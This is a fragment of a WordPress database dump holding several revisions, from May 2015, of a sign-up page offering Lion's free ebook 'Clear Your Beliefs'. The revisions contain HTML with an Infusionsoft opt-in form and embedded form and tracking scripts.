(2192, 2, '2015-05-29 12:25:35', '2015-05-29 17:25:35', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p style=""alignright" ><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/ec4d25c4ea7e88210ce7b8c897c925d5" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="ec4d25c4ea7e88210ce7b8c897c925d5" />\r\n    <input name="inf_form_name" type="hidden" value="Sign up for free &#a;Clear Your Beliefs&#a;eBook&#a;http://clearyourbeliefs.com/ebook" />\r\n    <input name="infusionsoft_version" type="hidden" value="1.41.0.42" />\r\n    <div class="infusion-field">\r\n        <label for="inf_field_FirstName">FIRST NAME *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">EMAIL *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</div>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:25:35', '2015-05-29 17:25:35', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2194, 2, '2015-05-29 12:26:55', '2015-05-29 17:26:55', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p style=""alignright" ><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:26:55', '2015-05-29 17:26:55', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2196, 2, '2015-05-29 12:30:34', '2015-05-29 17:30:34', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p><div class=''embed-container''><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div></p>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'open', 'open', '', '588-revision-v1', '', '', '2015-05-29 12:30:34', '2015-05-29 17:30:34', '', 588, 'http://clearyourbeliefs.com/588-revision-v1/', 0, 'revision', '', 0),
(2198, 2, '2015-05-29 12:35:38', '2015-05-29 17:35:38', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p style=""alignright" ><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:35:38', '2015-05-29 17:35:38', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2199, 2, '2015-05-29 12:36:36', '2015-05-29 17:36:36', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:36:36', '2015-05-29 17:36:36', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2207, 2, '2015-05-29 12:46:33', '2015-05-29 17:46:33', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2><small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n<p><ul><li>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</li>\r\n<li>You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</li></ul>\r\n</p>\r\n<p>If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n\r\n<small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small>\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:46:33', '2015-05-29 17:46:33', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2200, 2, '2015-05-29 12:37:38', '2015-05-29 17:37:38', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:37:38', '2015-05-29 17:37:38', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2202, 2, '2015-05-29 12:39:28', '2015-05-29 17:39:28', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:39:28', '2015-05-29 17:39:28', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2201, 2, '2015-05-29 12:38:42', '2015-05-29 17:38:42', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n<center>[su_box title="Get Lion''s free eBook, <em>Clear Your Beliefs!" box_color="#1a2d8c" radius="8"]</center>\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:38:42', '2015-05-29 17:38:42', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2203, 2, '2015-05-29 12:40:29', '2015-05-29 17:40:29', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:40:29', '2015-05-29 17:40:29', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2208, 2, '2015-05-29 12:48:16', '2015-05-29 17:48:16', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:48:16', '2015-05-29 17:48:16', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2206, 2, '2015-05-29 12:44:20', '2015-05-29 17:44:20', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><small>[Note: Your contact information will never be shared, and you can 